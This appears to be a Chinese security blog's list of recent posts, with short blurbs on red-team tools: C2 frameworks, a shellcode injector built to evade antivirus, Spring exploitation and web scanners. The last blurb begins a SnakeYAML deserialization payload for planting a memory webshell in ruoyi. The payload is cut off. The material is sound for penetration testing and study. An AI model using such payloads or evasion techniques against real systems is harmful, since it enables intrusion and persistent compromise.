- 最新文章
-
DecryptTools综合解密
一款针对加解密综合利用后渗透工具??♀️免责声明由于传播、利用DecryptTools综合解密工具提供的功能而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本人不为此承担任何责任。前言为什么会写这一款综合加解密工具,因为在很多比赛如果算拿下靶标不仅需要获取服务器权限还需要登录网站后台这时候很多系统要么数据库连接字符串加密,要么登陆用户加密而这款工具就是为了解决问题。加解密功能:… -
VSHELL
VSHELL安全对抗模拟、红队工具 Features为什么选择vshellvshell为您提供隧道代理和隐蔽通道,以模拟网络中的持久化攻击行为。支持多种协议、高兼容性、及强大的协作能力,帮助蓝队更好的评估安全设备水平,提高应急响应能力产品功能vshell被广泛用于红蓝攻防演练演练和对抗模拟中,模拟长期潜伏攻击者的策略和技术。1.支持多种协议的隐蔽通道(TCP、UDP/KCP、… -
ssp针对SpringBoot的渗透工具,Spring漏洞利用工具
ssp简介在日常渗透工作中,我遇到很多Spring框架搭建的服务,很多都是WhitelabelErrorPage页面,对于Spring的扫描工具github中也有很多项目python的java的,但使用go的就很少。因为自身电脑的缘故使用go编译的工具加入环境变量中能让我很方便的使用命令行来使用这些命令行工具,做到打开命令行就能进行"随手一测"。而像python,java写的类似图形化的工具,我… -
S-inject
S-injectDLL+Shellcode的Windows注入免杀工具只是罗列各种方法,免杀搭配其他技巧中要具体灵活使用须知:反射式注入参考了著名github项目:https://github.com/stephenfewer/ReflectiveDLLInjection该项目为反射式注入支持的DLLShellcode使用base64编码后的sh... -
XiebroC2
更新[+]2024.2.18XiebroC2-3.1发布[+]2024年2月20日XiebroC2-3.1修复bug:xiebroc2[+]2024.2.29XiebroC2更新,添加Websocket通信协议,支持域前置和cdn上线、修复3.1中的个bug:xiebroc2-v3.1.1[+]2024年3月7日随缘更新中。。。如果您喜欢该项目的话,可以右上角star+叉子+关注,非常感谢!特点被… -
Golden-hooped Rod
Golden-hoopedRod是一款对于web站点进行漏洞扫描的工具。工具使用python语言编写,使用的目录扫描字典均由真实环境而来。使用起来异常便捷。可以对web站点进行漏洞扫描、设置代理、设置线程等。使用方法usage:GHR.py[-h][-uURL][-ffilename][--upgrade][--nodir][--pr... -
TangGo 测试平台
angGo测试平台是无糖信息技术有限公司集多年渗透测试实战经验设计和开发的国产化综合性测试平台,为软件测试、网络安全从业人员提供强大且易用的测试工具及多人协同的工作环境,主要用于Web站点的功能测试、安全测试和安全评估。 -
VscanPlus
基于veo师傅的漏扫工具vscan二次开发的版本,开源、轻量、快速、跨平台的网站漏洞扫描工具,帮助您快速检测网站安全隐患。功能端口扫描(portscan)指纹识别(fingerprint)漏洞检测(ndaycheck)智能爆破(adminbrute)敏感文件扫描(filefuzz) -
Code-Audit-DependencyCheck
简介代码安全组件扫描-DependencyCheck升级版,增加对maven项目pom.xml文件引用的依赖jar进行组件漏洞扫描并输出指定模板样式报告编译环境 java: java-version 1.8 maven: mvn-version >=3.5.0调试用VSCode打开文件夹Code-Audit-DependencyCheck… -
ruoyi 后台定时任务注入哥斯拉内存马
yaml-payload-for-ruoyi测试环境ruoyiv4.6.0用法使用mvncleanpackage打包生成jar,或者直接下载release中的jar,放在web路径下ruoyi后台创建定时任务payloadorg.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager[!!java.net.URLClassLoade…